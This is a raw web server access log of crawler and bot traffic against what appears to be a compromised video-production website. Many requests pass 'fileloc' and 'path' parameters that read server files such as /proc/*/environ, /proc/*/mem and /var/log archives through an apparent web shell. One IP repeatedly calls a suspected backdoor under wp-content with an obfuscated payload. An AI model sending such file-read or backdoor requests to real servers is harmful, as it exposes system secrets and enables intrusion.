74.7.227.114 - - [05/Nov/2025:00:04:19 +0000] "GET /q-~27cn0p5CEZyJuVnzlzSWbHe3TRRsw6hd47712/ HTTP/1.0" 200 4576 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.182 - - [05/Nov/2025:00:04:20 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F84%2Fsmaps&path=%2F%2Fproc%2F84 HTTP/1.0" 200 2821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:20 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F508%2Fwchan&path=%2F%2Fproc%2F508 HTTP/1.0" 200 2823 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:20 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F95%2Fclear_refs&path=%2F%2Fproc%2F95 HTTP/1.0" 200 2824 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.248.20 - - [05/Nov/2025:00:01:59 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323330343531392p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323330303931392q6337393264633134613361623738303562333630323763386366626335396465222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
216.73.216.182 - - [05/Nov/2025:00:04:20 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F766%2Fautogroup&path=%2F%2Fproc%2F766 HTTP/1.0" 200 2833 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:20 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F661%2Foom_adj&path=%2F%2Fproc%2F661 HTTP/1.0" 200 2826 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:20 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F273%2Fmounts&path=%2F%2Fproc%2F273 HTTP/1.0" 200 3566 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:21 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F17%2Foom_score&path=%2F%2Fproc%2F17 HTTP/1.0" 200 2826 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:21 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F506%2Fmaps&path=%2F%2Fproc%2F506 HTTP/1.0" 200 2821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:21 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F651%2Fmounts&path=%2F%2Fproc%2F651 HTTP/1.0" 200 3566 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:21 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F109%2Fmountstats&path=%2F%2Fproc%2F109 HTTP/1.0" 200 2824 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:21 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F91%2Fcgroup&path=%2F%2Fproc%2F91 HTTP/1.0" 200 2926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:21 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F23%2Fprojid_map&path=%2F%2Fproc%2F23 HTTP/1.0" 200 2839 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:21 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3710850%2Fmaps&path=%2F%2Fproc%2F3710850 HTTP/1.0" 200 2824 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:21 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F661%2Fsmaps&path=%2F%2Fproc%2F661 HTTP/1.0" 200 2822 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:21 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F8%2Fcpuset&path=%2F%2Fproc%2F8 HTTP/1.0" 200 2821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:22 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F695%2Fschedstat&path=%2F%2Fproc%2F695 HTTP/1.0" 200 2841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:22 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F8%2Fstat&path=%2F%2Fproc%2F8 HTTP/1.0" 200 2896 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:22 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F15%2Fschedstat&path=%2F%2Fproc%2F15 HTTP/1.0" 200 2835 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:22 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F21%2Fpagemap&path=%2F%2Fproc%2F21 HTTP/1.0" 200 2823 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:22 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F1445%2Fsched&path=%2F%2Fproc%2F1445 HTTP/1.0" 200 3226 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:22 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3710850%2Fstatm&path=%2F%2Fproc%2F3710850 HTTP/1.0" 200 2825 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:22 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F1526156%2Fstatm&path=%2F%2Fproc%2F1526156 HTTP/1.0" 200 2847 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:22 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3%2Foom_adj&path=%2F%2Fproc%2F3 HTTP/1.0" 200 2823 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:23 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F14%2Foom_adj&path=%2F%2Fproc%2F14 HTTP/1.0" 200 2825 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.114 - - [05/Nov/2025:00:04:23 +0000] "GET /q-~182RxaACpQbjhvm8nFSUFTk90n3QmfVxf8147/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.182 - - [05/Nov/2025:00:04:23 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F506%2Fstatm&path=%2F%2Fproc%2F506 HTTP/1.0" 200 2826 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:23 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F15%2Fsessionid&path=%2F%2Fproc%2F15 HTTP/1.0" 200 2831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:23 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F580%2Fmountstats&path=%2F%2Fproc%2F580 HTTP/1.0" 200 2825 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:23 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F24%2Ftimerslack_ns&path=%2F%2Fproc%2F24 HTTP/1.0" 200 2827 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:23 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F6%2Flimits&path=%2F%2Fproc%2F6 HTTP/1.0" 200 3080 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:23 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F8%2Fcomm&path=%2F%2Fproc%2F8 HTTP/1.0" 200 2829 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:24 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F14%2Fsmaps&path=%2F%2Fproc%2F14 HTTP/1.0" 200 2820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:24 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F21%2Farch_status&path=%2F%2Fproc%2F21 HTTP/1.0" 200 2824 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:24 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F1445%2Fauxv&path=%2F%2Fproc%2F1445 HTTP/1.0" 200 2823 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:24 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F24%2Flimits&path=%2F%2Fproc%2F24 HTTP/1.0" 200 3082 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:24 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F109%2Foom_adj&path=%2F%2Fproc%2F109 HTTP/1.0" 200 2826 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:24 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F1445%2Fmounts&path=%2F%2Fproc%2F1445 HTTP/1.0" 200 3567 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:24 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F109%2Fio&path=%2F%2Fproc%2F109 HTTP/1.0" 200 2819 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:25 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F17%2Fschedstat&path=%2F%2Fproc%2F17 HTTP/1.0" 200 2848 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:25 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F695%2Fcomm&path=%2F%2Fproc%2F695 HTTP/1.0" 200 2826 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:25 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3%2Fio&path=%2F%2Fproc%2F3 HTTP/1.0" 200 2817 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:25 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F580%2Fio&path=%2F%2Fproc%2F580 HTTP/1.0" 200 2820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:25 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F21%2Fsetgroups&path=%2F%2Fproc%2F21 HTTP/1.0" 200 2826 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:25 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F1445%2Fmem&path=%2F%2Fproc%2F1445 HTTP/1.0" 200 2821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:04:26 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F15%2Fenviron&path=%2F%2Fproc%2F15 HTTP/1.0" 200 2823 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.114 - - [05/Nov/2025:00:04:28 +0000] "GET /q-~140wQ9R0RPxMpaGHCGFC7sYa8jYqHvifb3673/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.71.1 - - [05/Nov/2025:00:04:28 +0000] "GET /?products=1050243724 HTTP/1.0" 200 26177 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.164 - - [05/Nov/2025:00:04:28 +0000] "GET /?products=663676130 HTTP/1.0" 200 24977 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.163 - - [05/Nov/2025:00:04:29 +0000] "GET /?products=1770268896 HTTP/1.0" 200 25993 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.114 - - [05/Nov/2025:00:04:30 +0000] "GET /q-~289XHEZMvTXlxBz8lKoykkj7sRGzMrq0a21688/ HTTP/1.0" 200 4576 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.132.10 - - [05/Nov/2025:00:04:31 +0000] "GET /q-~93qbp4QWI1B7jVy6fquIIz9sJyzww77B24412 HTTP/1.0" 200 4576 "https://lamphimquangcao.net/sitemap537.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
74.7.227.114 - - [05/Nov/2025:00:04:35 +0000] "GET /q-~140wQ9R0RPxMpaGHCGFC7sYa8jYqHvifb3673/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/readme.html&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 5908 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
217.113.194.39 - - [05/Nov/2025:00:04:36 +0000] "GET /our-works/tvc-voca-deli/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4581 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
74.7.227.114 - - [05/Nov/2025:00:04:37 +0000] "GET /q-~252rAG9ymxZsYif9HiKN2QcSKsMVIiouw34457/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [05/Nov/2025:00:04:41 +0000] "GET /q-~27cn0p5CEZyJuVnzlzSWbHe3TRRsw6hd47712/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [05/Nov/2025:00:02:21 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323330343534312p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323330303934312q3436643831323362333536326430303833346138653936303439323131366539222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
74.7.227.114 - - [05/Nov/2025:00:04:45 +0000] "GET /q-~182RxaACpQbjhvm8nFSUFTk90n3QmfVxf8147/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images/images HTTP/1.0" 200 3422 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [05/Nov/2025:00:04:48 +0000] "GET /q-~140wQ9R0RPxMpaGHCGFC7sYa8jYqHvifb3673/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images/images HTTP/1.0" 200 3422 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [05/Nov/2025:00:04:52 +0000] "GET /q-~289XHEZMvTXlxBz8lKoykkj7sRGzMrq0a21688/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/home.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3085 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [05/Nov/2025:00:04:54 +0000] "GET /q-~289XHEZMvTXlxBz8lKoykkj7sRGzMrq0a21688/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
217.113.194.211 - - [05/Nov/2025:00:04:55 +0000] "GET /our-works/phim-viral-ila/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4576 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
74.7.227.114 - - [05/Nov/2025:00:04:57 +0000] "GET /q-~252rAG9ymxZsYif9HiKN2QcSKsMVIiouw34457/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images/images HTTP/1.0" 200 3422 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.71.2 - - [05/Nov/2025:00:04:58 +0000] "GET /?products=1413575336 HTTP/1.0" 200 22993 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.164 - - [05/Nov/2025:00:05:00 +0000] "GET /?products=663518700 HTTP/1.0" 200 25004 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.114 - - [05/Nov/2025:00:05:02 +0000] "GET /q-~289XHEZMvTXlxBz8lKoykkj7sRGzMrq0a21688/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/wp-log1n.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3859 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [05/Nov/2025:00:05:04 +0000] "GET /q-~182RxaACpQbjhvm8nFSUFTk90n3QmfVxf8147/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images/images/images HTTP/1.0" 200 3367 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.182 - - [05/Nov/2025:00:05:04 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fpvmove&path=%2F%2Fsbin HTTP/1.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:04 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fmkfs.vfat&path=%2F%2Fsbin HTTP/1.0" 200 2814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:05 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fdeluser&path=%2F%2Fsbin HTTP/1.0" 200 8330 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.248.20 - - [05/Nov/2025:00:02:44 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323330343536342p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323330303936342q6131373534633961383364656437653364313333353035393964366536343134222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
216.73.216.182 - - [05/Nov/2025:00:05:05 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Flog%2Falternatives.log.4.gz&path=%2Fvar%2Flog HTTP/1.0" 200 2832 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:05 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fntfsundelete&path=%2F%2Fsbin HTTP/1.0" 200 2817 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:06 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Flog%2Falternatives.log.5.gz&path=%2Fvar%2Flog HTTP/1.0" 200 2833 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:06 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fos-probes%2F50mounted-tests&path=%2F%2Flib%2Fos-probes HTTP/1.0" 200 3775 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:06 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Flog%2Fdpkg.log.4.gz&path=%2Fvar%2Flog HTTP/1.0" 200 2827 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:06 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2Fvar%2Flog%2Fdpkg.log.5.gz&path=%2Fvar%2Flog HTTP/1.0" 200 2828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:06 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fetc%2Fmanpath.config&path=%2F%2Fetc HTTP/1.0" 200 4759 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:07 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fvgexport&path=%2F%2Fsbin HTTP/1.0" 200 2815 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:07 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fftpquota&path=%2F%2Fsbin HTTP/1.0" 200 9550 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:07 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2Fvar%2Flog%2Fproftpd%2Fproftpd.log.4.gz&path=%2Fvar%2Flog%2Fproftpd HTTP/1.0" 200 2837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
